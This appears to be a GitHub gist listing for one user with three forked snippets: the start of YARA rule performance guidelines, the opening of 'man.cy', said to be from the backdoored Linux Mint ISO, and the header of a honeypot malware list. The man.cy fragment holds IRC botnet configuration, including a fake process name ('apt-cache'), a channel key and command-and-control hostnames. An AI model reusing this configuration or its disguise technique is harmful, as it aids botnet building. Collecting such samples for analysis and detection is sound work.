zam89 / yara_performance_guidelines.md
Created November 11, 2016 03:01 — forked from Neo23x0/yara_performance_guidelines.md
YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.1, February 2016, applies to all YARA versions 3.3+

Global Rules

Global rules are evaluated first. Only if they are satisfied are the non-global rules evaluated. This is useful when all samples share the same characteristics. Combine them with the "private" statement to suppress match notifications for the global rules themselves.

zam89 / man.cy
Created February 23, 2016 01:51 — forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",
zam89 / mwlist.txt
Created June 26, 2014 07:30 — forked from hwdsl2/README.md
# This list summarizes recent malware caught in my Kippo SSH Honeypot (http://code.google.com/p/kippo/)
#
# For detailed instructions, please see:
# https://blog.ls20.com/check-your-server-for-malware-from-ssh-brute-force-attacks/
#
# Last Updated: March 24, 2014
#
# Copyright (C) 2014 Lin Song
#
# This program is free software: you can redistribute it and/or modify it under